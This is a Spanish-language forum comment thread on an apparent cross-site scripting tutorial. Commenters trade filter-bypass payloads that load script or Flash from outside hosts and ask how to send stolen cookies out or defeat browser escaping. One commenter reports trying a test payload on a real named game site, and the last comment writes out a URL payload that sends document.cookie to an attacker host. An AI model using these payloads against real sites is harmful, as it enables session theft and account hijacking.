se me viene a la mente.. <embed src="//sirdarckcat.net/xss.swf"> o.. <script/src=//0x.lv/.. y la vdd me da flojera pensar en mas xD la cantidad de formas de burlar ese filtro son infinitas..

esta basado en blacklisting (primer error), usa una lista de tags muy incompleta (segundo error), asume que el codigo que mandara el atacante es valido (tercer error), no toma en cuenta las extensiones de los navegadores (cuarto error), y hay mas errores pero ando con flojera.

Saludos!!

html_entities ?

Hola gente..
Hay manera de enviar un e-mail con la cookie con javascript?
O lo mas recomendable es escribir en algun archivo de algun hosting?

Hola amigo intente ponerlo el primero codigo (<script>alert()</script>) y al momento y me salio esto la pagina es www.z8games.com

no se si es algo malo o bueno ( Soy novato)

Hola a todos,

  El caso es que ando probando esta forma de ataque XSS con una aplicación vulnerable, y otra aplicación malintencionada, ambas creadas y alojadas por mi, y no consigo hacerlo funcionar. El codigo de la aplicacion malintencionada es exactamente el propuesto aqui para copiar la cookie a "archivo.txt" y la "url maligna" queda del siguiente modo:
El caso es que al ver posteriormente el codigo fuente de la pagina, parece que en navegador (probado en opera y en chrome) inserta caracteres de escape para las comillas simples, es decir ' -> \' con lo que parece que los navegadores ya proporcionan proteccion contra este tipo de ataque. He probado a cambiar desde la ? a hexadecimal.., a cambiar las comillas simples por dobles, y nada. Unicamente al cambiar las simples por graves ' -> ` parece que el navegador no las toca, pero tampoco funciona. ¿Alguna idea de si este comportamiento es asi, o estoy haciendo algo mal? En caso de que sea asi ¿como lo engañamos? Gracias.

Saludos!

Saludos,

Estuve intentando el tutorial y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo

asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

como puedo hacer para que se ejecute? Saludos